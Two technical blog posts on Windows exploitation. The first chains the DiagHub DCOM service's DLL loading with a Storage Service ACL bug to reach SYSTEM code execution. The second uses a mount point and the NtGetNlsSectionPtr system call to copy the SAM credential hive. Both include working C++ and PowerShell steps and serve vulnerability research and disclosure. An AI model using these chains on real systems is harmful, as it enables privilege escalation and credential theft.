Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege

Previously I presented a technique to exploit arbitrary directory creation vulnerabilities on Windows to give you read access to any file on the system. In the upcoming Spring Creators Update (RS4) the abuse of mount points to link to files as I exploited in the previous blog post has been remediated. This is an example of a long term security benefit from detailing how vulnerabilities might be exploited, giving a developer an incentive to find ways of mitigating the exploitation vector.

Keeping with that spirit in this blog post I’ll introduce a novel technique to exploit the more common case of arbitrary file writes on Windows 10. Perhaps once again Microsoft might be able to harden the OS to make it more difficult to exploit these types of vulnerabilities. I’ll demonstrate exploitation by describing in detail the recently fixed issue that Project Zero reported to Microsoft (issue 1428).

An arbitrary file write vulnerability is where a user can create or modify a file in a location they could not normally access. This might be due to a privileged service incorrectly sanitizing information passed by the user or due to a symbolic link planting attack where the user can write a link into a location which is subsequently used by the privileged service. The ideal vulnerability is one where the attacking user not only controls the location of the file being written but also the entire contents. This is the type of vulnerability we’ll consider in this blog post.

A common way of exploiting arbitrary file writes is to perform DLL hijacking. When a Windows executable begins executing the initial loader in NTDLL will attempt to find all imported DLLs. The locations that the loader checks for imported DLLs are more complex than you’d expect but for our purposes can be summarized as follows: 

  1. Check Known DLLs, which is a pre-cached list of DLLs which are known to the OS. If found, the DLL is mapped into memory from a pre-loaded section object.
  2. Check the application’s directory, for example if importing TEST.DLL and the application is in C:\APP then it will check C:\APP\TEST.DLL.
  3. Check the system locations, such as C:\WINDOWS\SYSTEM32 and C:\WINDOWS.
  4. If all else fails search the current environment PATH.

The aim of the DLL hijack is to find an executable which runs at a high privilege which will load a DLL from a location that the vulnerability allows us to write to. The hijack only succeeds if the DLL hasn’t already been found in a location checked earlier.

There are two problems which make DLL hijacking annoying:

 

  1. You typically need to create a new instance of a privileged process as the majority of DLL imports are resolved when the process is first executed.
  2. Most system binaries, executables and DLLs that will run as a privileged user will be installed into SYSTEM32.

The second problem means that in steps 2 and 3 the loader will always look for DLLs in SYSTEM32. Assuming that overwriting a DLL isn’t likely to be an option (at the least if the DLL is already loaded you can’t write to the file), that makes it harder to find a suitable DLL to hijack. A typical way around these problems is to pick an executable that is not located in SYSTEM32 and which can be easily activated, such as by loading a COM server or running a scheduled task.

Even if you find a suitable target executable to DLL hijack the implementation can be quite ugly. Sometimes you need to implement stub exports for the original DLL, otherwise the loading of the DLL will fail. In other cases the best place to run code is during DllMain, which introduces other problems such as running code inside the loader lock. What would be nice is a privileged service that will just load an arbitrary DLL for us, no hijacking, no needing to spawn the “correct” privileged process. The question is, does such a service exist?

It turns out yes one does, and the service itself has been abused at least twice previously, once by Lokihardt for a sandbox escape, and once by me for user to system EoP. This service goes by the name “Microsoft (R) Diagnostics Hub Standard Collector Service,” but we’ll call it DiagHub for short.

The DiagHub service was introduced in Windows 10, although there’s a service that performs a similar task called IE ETW Collector in Windows 7 and 8.1. The purpose of the service is to collect diagnostic information using Event Tracing for Windows (ETW) on behalf of sandboxed applications, specifically Edge and Internet Explorer. One of its interesting features is that it can be configured to load an arbitrary DLL from the SYSTEM32 directory, which is the exact feature that Lokihardt and I exploited to gain elevated privileges. All the functionality for the service is exposed over a registered DCOM object, so in order to load our DLL we’ll need to work out how to call methods on that DCOM object. At this point you can skip to the end but if you want to understand how I would go about finding how the DCOM object is implemented, the next section might be of interest.

Reverse Engineering a DCOM Object

Let’s go through the steps I would take to try and find what interfaces an unknown DCOM object supports and find the implementation so we can reverse engineer them. There are two approaches I will typically take, go straight for RE in IDA Pro or similar, or do some on-system inspection first to narrow down the areas we have to investigate. Here we’ll go for the second approach as it’s more informative. I can’t say how Lokihardt found his issue; I’m going to opt for magic.

For this approach we’ll need some tools, specifically my OleViewDotNet v1.4+ (OVDN) tool from github as well as an installation of WinDBG from the SDK. The first step is to find the registration information for the DCOM object and discover what interfaces are accessible. We know that the DCOM object is hosted in a service so once you’ve loaded OVDN go to the menu Registry ⇒ Local Services and the tool will load a list of registered system services which expose COM objects. If you now find the  “Microsoft (R) Diagnostics Hub Standard Collector Service” service (applying a filter here is helpful) you should find the entry in the list. If you open the service tree node you’ll see a child, “Diagnostics Hub Standard Collector Service,” which is the hosted DCOM object. If you open that tree node the tool will create the object, then query for all remotely accessible COM interfaces to give you a list of interfaces the object supports. I’ve shown this in the screenshot below:

While we’re here it’s useful to inspect what security is required to access the DCOM object. If you right click the class treenode you can select View Access Permissions or View Launch Permissions and you’ll get a window that shows the permissions. In this case it shows that this DCOM object will be accessible from IE Protected Mode as well as Edge’s AppContainer sandbox, including LPAC.

Of the list of interfaces shown we only really care about the standard interfaces. Sometimes there are interesting interfaces in the factory but in this case there aren’t. Of these standard interfaces there are two we care about, the IStandardCollectorAuthorizationService and IStandardCollectorService. Just to cheat slightly I already know that it’s the IStandardCollectorService service we’re interested in, but as the following process is going to be the same for each of the interfaces it doesn’t matter which one we pick first. If you right click the interface treenode and select Properties you can see a bit of information about the registered interface.

There’s not much more information that will help us here, other than we can see there are 8 methods on this interface. As with a lot of COM registration information, this value might be missing or erroneous, but in this case we’ll assume it’s correct. To understand what the methods are we’ll need to track down the implementation of IStandardCollectorService inside the COM server. This knowledge will allow us to target our RE efforts to the correct binary and the correct methods. Doing this for an in-process COM object is relatively easy as we can query for an object’s VTable pointer directly by dereferencing a few pointers. However, for out-of-process it’s more involved. This is because the actual in-process object you’d call is really a proxy for the remote object, as shown in the following diagram:

All is not lost, however; we can still find the the VTable of the OOP object by extracting the information stored about the object in the server process. Start by right clicking the “Diagnostics Hub Standard Collector Service” object tree node and select Create Instance. This will create a new instance of the COM object as shown below:

The instance gives you basic information such as the CLSID for the object which we’ll need later (in this case {42CBFAA7-A4A7-47BB-B422-BD10E9D02700}) as well as the list of supported interfaces. Now we need to ensure we have a connection to the interface we’re interested in. For that select theIStandardCollectorService interface in the lower list, then in the Operations menu at the bottom selectMarshal ⇒ View Properties. If successful you’ll now see the following new view:

There’s a lot of information in this view but the two pieces of most interest are the Process ID of the hosting service and the Interface Pointer Identifier (IPID). In this case the Process ID should be obvious as the service is running in its own process, but this isn’t always the case—sometimes when you create a COM object you’ve no idea which process is actually hosting the COM server so this information is invaluable. The IPID is the unique identifier in the hosting process for the server end of the DCOM object; we can use the Process ID and the IPID in combination to find this server and from that find out the location of the actual VTable implementing the COM methods. It’s worth noting that the maximum Process ID size from the IPID is 16 bits; however, modern versions of Windows can have much larger PIDs so there’s a chance that you’ll have to find the process manually or restart the service multiple times until you get a suitable PID.

Now we’ll use a feature of OVDN which allows us to reach into the memory of the server process and find the IPID information. You can access information about all processes through the main menu Object ⇒ Processes but as we know which process we’re interested in just click the View button next to the Process ID in the marshal view. You do need to be running OVDN as an administrator otherwise you’ll not be able to open the service process. If you’ve not done so already the tool will ask you to configure symbol support as OVDN needs public symbols to find the correct locations in the COM DLLs to parse. You’ll want to use the version of DBGHELP.DLL which comes with WinDBG as that supports remote symbol servers. Configure the symbols similar to the following dialog:

If everything is correctly configured and you’re an administrator you should now see more details about the IPID, as shown below:

 

The two most useful pieces of information here are the Interface pointer, which is the location of the heap allocated object (in case you want to inspect its state), and the VTable pointer for the interface. The VTable address gives us information for where exactly the COM server implementation is located. As we can see here the VTable is located in a different module (DiagnosticsHub.StandardCollector.Runtime) from the main executable (DiagnosticsHub.StandardCollector.Server). We can verify the VTable address is correct by attaching to the service process using WinDBG and dumping the symbols at the VTable address. We also know from before we’re expecting 8 methods so we can take that into account by using the command:

dqs DiagnosticsHub_StandardCollector_Runtime+0x36C78 L8

Note that WinDBG converts periods in a module name to underscores. If successful you’ll see the something similar to the following screenshot:

Extracting out that information we now get the name of the methods (shown below) as well as the address in the binary. We could set breakpoints and see what gets called during normal operation, or take this information and start the RE process.

ATL::CComObject<StandardCollectorService>::QueryInterface

ATL::CComObjectCached<StandardCollectorService>::AddRef

ATL::CComObjectCached<StandardCollectorService>::Release

StandardCollectorService::CreateSession

StandardCollectorService::GetSession

StandardCollectorService::DestroySession

StandardCollectorService::DestroySessionAsync

StandardCollectorService::AddLifetimeMonitorProcessIdForSession

The list of methods looks correct: they start with the 3 standard methods for a COM object, which in this case are implemented by the ATL library. Following those methods are five implemented by theStandardCollectorService class. Being public symbols, this doesn’t tell us what parameters we expect to pass to the COM server. Due to C++ names containing some type information, IDA Pro might be able to extract that information for you, however that won’t necessarily tell you the format of any structures which might be passed to the function. Fortunately due to how COM proxies are implemented using the Network Data Representation (NDR) interpreter to perform marshalling, it’s possible to reverse the NDR bytecode back into a format we can understand. In this case go back to the original service information, right click theIStandardCollectorService treenode and select View Proxy Definition. This will get OVDN to parse the NDR proxy information and display a new view as shown below.

Viewing the proxy definition will also parse out any other interfaces which that proxy library implements. This is likely to be useful for further RE work. The decompiled proxy definition is shown in a C# like pseudo code but it should be easy to convert into working C# or C++ as necessary. Notice that the proxy definition doesn’t contain the names of the methods but we’ve already extracted those out. So applying a bit of cleanup and the method names we get a definition which looks like the following:

[uuid(«0d8af6b7-efd5-4f6d-a834-314740ab8caa»)]
struct IStandardCollectorService : IUnknown {
   HRESULT CreateSession(_In_ struct Struct_24* p0, 
                         _In_ IStandardCollectorClientDelegate* p1,
                         _Out_ ICollectionSession** p2);
   HRESULT GetSession(_In_ GUID* p0, _Out_ ICollectionSession** p1);
   HRESULT DestroySession(_In_ GUID* p0);
   HRESULT DestroySessionAsync(_In_ GUID* p0);
   HRESULT AddLifetimeMonitorProcessIdForSession(_In_ GUID* p0, [In] int p1);
}

There’s one last piece missing; we don’t know the definition of the Struct_24 structure. It’s possible to extract this from the RE process but fortunately in this case we don’t have to. The NDR bytecode must know how to marshal this structure across so OVDN just extracts the structure definition out for us automatically: select the Structures tab and find Struct_24.

As you go through the RE process you can repeat this process as necessary until you understand how everything works. Now let’s get to actually exploiting the DiagHub service and demonstrating its use with a real world exploit.

Example Exploit

So after our efforts of reverse engineering, we’ll discover that in order to to load a DLL from SYSTEM32 we need to do the following steps:

  1. Create a new Diagnostics Session using IStandardCollectorService::CreateSession.
  2. Call the ICollectionSession::AddAgent method on the new session, passing the name of the DLL to load (without any path information).

The simplified loading code for ICollectionSession::AddAgent is as follows:

void EtwCollectionSession::AddAgent(LPWCSTR dll_path, 
                                   REFGUID guid) {
 WCHAR valid_path[MAX_PATH];
 if ( !GetValidAgentPath(dll_path, valid_path)) {
   return E_INVALID_AGENT_PATH;
 HMODULE mod = LoadLibraryExW(valid_path, 
       nullptr, LOAD_WITH_ALTERED_SEARCH_PATH);
 dll_get_class_obj = GetProcAddress(hModule, «DllGetClassObject»);
 return dll_get_class_obj(guid);
}

We can see that it checks that the agent path is valid and returns a full path (this is where the previous EoP bugs existed, insufficient checks). This path is loading using LoadLibraryEx, then the DLL is queried for the exported method DllGetClassObject which is then called. Therefore to easily get code execution all we need is to implement that method and drop the file into SYSTEM32. The implemented DllGetClassObject will be called outside the loader lock so we can do anything we want. The following code (error handling removed) will be sufficient to load a DLL called dummy.dll.

IStandardCollectorService* service;
CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER,IID_PPV_ARGS(&service));

SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
config.path = ::SysAllocString(L»C:\Dummy»);
ICollectionSession* session;
service->CreateSession(&config, nullptr, &session);

GUID agent_guid;
CoCreateGuid(&agent_guid);
session->AddAgent(L»dummy.dll», agent_guid);

All we need now is the arbitrary file write so that we can drop a DLL into SYSTEM32, load it and elevate our privileges. For this I’ll demonstrate using a vulnerability I found in the SvcMoveFileInheritSecurity RPC method in the system Storage Service. This function caught my attention due to its use in an exploit for a vulnerability in ALPC discovered and presented by Clément Rouault & Thomas Imbert at PACSEC 2017. While this method was just a useful exploit primitive for the vulnerability I realized it has not one, but two actual vulnerabilities lurking in it (at least from a normal user privilege). The code prior to any fixes forSvcMoveFileInheritSecurity looked like the following:

void SvcMoveFileInheritSecurity(LPCWSTR lpExistingFileName, 
                               LPCWSTR lpNewFileName, 
                               DWORD dwFlags) {
 PACL pAcl;
 if (!RpcImpersonateClient()) {
   // Move file while impersonating.
   if (MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags)) {
     RpcRevertToSelf();
     // Copy inherited DACL while not.
     InitializeAcl(&pAcl, 8, ACL_REVISION);
     DWORD status = SetNamedSecurityInfo(lpNewFileName, SE_FILE_OBJECT, 
         UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION,
         nullptr, nullptr, &pAcl, nullptr);
       if (status != ERROR_SUCCESS)
         MoveFileEx(lpNewFileName, lpExistingFileName, dwFlags);
   }
   else {
     // Copy file instead…
     RpcRevertToSelf();
   }
 }
}

The purpose of this method seems to be to move a file then apply any inherited ACE’s to the DACL from the new directory location. This would be necessary as when a file is moved on the same volume, the old filename is unlinked and the file is linked to the new location. However, the new file will maintain the security assigned from its original location. Inherited ACEs are only applied when a new file is created in a directory, or as in this case, the ACEs are explicitly applied by calling a function such as SetNamedSecurityInfo.

To ensure this method doesn’t allow anyone to move an arbitrary file while running as the service’s user, which in this case is Local System, the RPC caller is impersonated. The trouble starts immediately after the first call to MoveFileEx, the impersonation is reverted and SetNamedSecurityInfo is called. If that call fails then the code calls MoveFileEx again to try and revert the original move operation. This is the first vulnerability; it’s possible that the original filename location now points somewhere else, such as through the abuse of symbolic links. It’s pretty easy to cause SetNamedSecurityInfo to fail, just add a Deny ACL for Local System to the file’s ACE for WRITE_DAC and it’ll return an error which causes the revert and you get an arbitrary file creation. This was reported as issue 1427.

This is not in fact the vulnerability we’ll be exploiting, as that would be too easy. Instead we’ll exploit a second vulnerability in the same code: the fact that we can get the service to call SetNamedSecurityInfo on any file we like while running as Local System. This can be achieved either by abusing the impersonated device map to redirect the local drive letter (such as C:) when doing the initial MoveFileEx, which then results in lpNewFileName pointing to an arbitrary location, or more interestingly abusing hard links. This was reported as issue 1428. We can exploit this using hard links as follows:

  1. Create a hard link to a target file in SYSTEM32 that we want to overwrite. We can do this as you don’t need to have write privileges to a file to create a hard link to it, at least outside of a sandbox.
  2. Create a new directory location that has an inheritable ACE for a group such as Everyone or Authenticated Users to allow for modification of any new file. You don’t even typically need to do this explicitly; for example, any new directory created in the root of the C: drive has an inherited ACE for Authenticated Users. Then a request can be made to the RPC service to move the hardlinked file to the new directory location. The move succeeds under impersonation as long as we have FILE_DELETE_CHILD access to the original location and FILE_ADD_FILE in the new location, which we can arrange.
  3. The service will now call SetNamedSecurityInfo on the moved hardlink file. SetNamedSecurityInfo will pick up the inherited ACEs from the new directory location and apply them to the hardlinked file. The reason the ACEs are applied to the hardlinked file is from the perspective of SetNamedSecurityInfo the hardlinked file is in the new location, even though the original target file we linked to was in SYSTEM32.

By exploiting this we can modify the security of any file that Local System can access for WRITE_DAC access. Therefore we can modify a file in SYSTEM32, then use the DiagHub service to load it. There is a slight problem, however. The majority of files in SYSTEM32 are actually owned by the TrustedInstaller group and so cannot be modified, even by Local System. We need to find a file we can write to which isn’t owned by TrustedInstaller. Also we’d want to pick a file that won’t cause the OS install to become corrupt. We don’t care about the file’s extension as AddAgent only checks that the file exists and loads it with LoadLibraryEx. There are a number of ways we can find a suitable file, such as using the SysInternals AccessChk utility, but to be 100% certain that the Storage Service’s token can modify the file we’ll use my NtObjectManagerPowerShell module (specifically its Get-AccessibleFile cmdlet, which accepts a process to do the access check from). While the module was designed for checking accessible files from a sandbox, it also works to check for files accessible by privileged services. If you run the following script as an administrator with the module installed the $files variable will contain a list of files that the Storage Service has WRITE_DAC access to.

Import-Module NtObjectManager

Start-Service Name «StorSvc»
Set-NtTokenPrivilege SeDebugPrivilege | Out-Null
$files = Use-NtObject($p = Get-NtProcess ServiceName «StorSvc») {
   Get-AccessibleFile Win32Path C:\Windows\system32 Recurse `
    MaxDepth 1 FormatWin32Path AccessRights WriteDac CheckMode FilesOnly
}

Looking through the list of files I decided to pick on the file license.rtf, which contains a short license statement for Windows. The advantage of this file is it’s very likely to be not be critical to the operation of the system and so overwriting it shouldn’t cause the installation to become corrupted.

So putting it all together:

  1. Use the Storage Service vulnerability to change the security of the license.rtf file inside SYSTEM32.
  2. Copy a DLL, which implements DllGetClassObject over the license.rtf file.
  3. Use the DiagHub service to load our modified license file as a DLL, get code execution as Local System and do whatever we want.

If you’re interested in seeing a fully working example, I’ve uploaded a full exploit to the original issue on the tracker.

Wrapping Up

In this blog post I’ve described a useful exploit primitive for Windows 10, which you can even use from some sandboxed environments such as Edge LPAC. Finding these sorts of primitives makes exploitation much simpler and less error-prone. Also I’ve given you a taste of how you can go about finding your own bugs in similar DCOM implementations.

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Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist — for example, here’s one that was in the Linux subsystem — but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,

                              PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,

                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,

                    FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new(«Unknown»,`
       0x800 bor $ControlCode, «Buffered», «Any»)
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?

 

If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,

                           DWORD CodePage,
                           PVOID *SectionPointer,

                           PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,

                            &section_name,
                            OBJ_KERNEL_HANDLE |

                            OBJ_OPENIF |

                            OBJ_CASE_INSENSITIVE |

                            OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,

                        SECTION_MAP_READ,

                        &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;

   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;


   RtlpInitNlsFileName(NlsType,

                       CodePage,

                       &file_name);
   InitializeObjectAttributes(&obj_attr,

                              &file_name,
                              OBJ_KERNEL_HANDLE |

                              OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,

              &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,

                   &section_obj_attr, NULL,

                   PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(

                     section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,

                        DWORD CodePage,

                        PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,

             L»\\SystemRoot\\System32\\c_%.3d.nls», CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.

 

So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.

 

$dir = «\SystemRoot\system32\c_1337.nls»
New-Directory $dir
 
$target_path = «\SystemRoot\system32\config\SAM»
Use-NtObject($file = Get-NtFile $dir `

            —Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =

    [NtApiDotNet.NtLocale]::GetNlsSectionPtr(«CodePage», 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite(«sam.bin»)) {
   $map.GetStream().CopyTo($output)
   Write-Host «Copied file»
 }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.

 

It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.